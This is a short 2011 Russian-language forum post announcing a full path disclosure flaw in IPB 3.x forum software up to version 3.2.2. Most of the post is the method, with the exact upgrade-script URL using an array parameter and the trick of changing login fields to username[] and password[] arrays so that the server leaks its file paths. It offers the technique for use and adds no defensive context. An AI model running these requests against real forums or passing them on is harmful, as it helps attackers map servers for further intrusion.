Показать сообщение отдельно

  #47  
Старый 16.09.2011, 19:21
Export
Новичок
Регистрация: 13.02.2010
Сообщений: 0
С нами: 8547867

Репутация: 0
По умолчанию

Нашёл уязвимость на форумах IPB 3.x.x (Работает вплоть до 3.2.2.)

Код:
Раскрытие путей.
(должен быть доступен upgrade) http://форум/admin/upgrade/index.php?app=upgrade&s=&section[]=index&do=login Также раскрытие доступно через. HTTP Live Header. Смотрим заголовки,меняем в http://форум/admin/upgrade/index.php?app=upgrade&s=&section=index&do=login запрос do=login&username=asd&password=asd(пример запроса) на do=login&username[]=asd&password[]=asd
 
Ответить с цитированием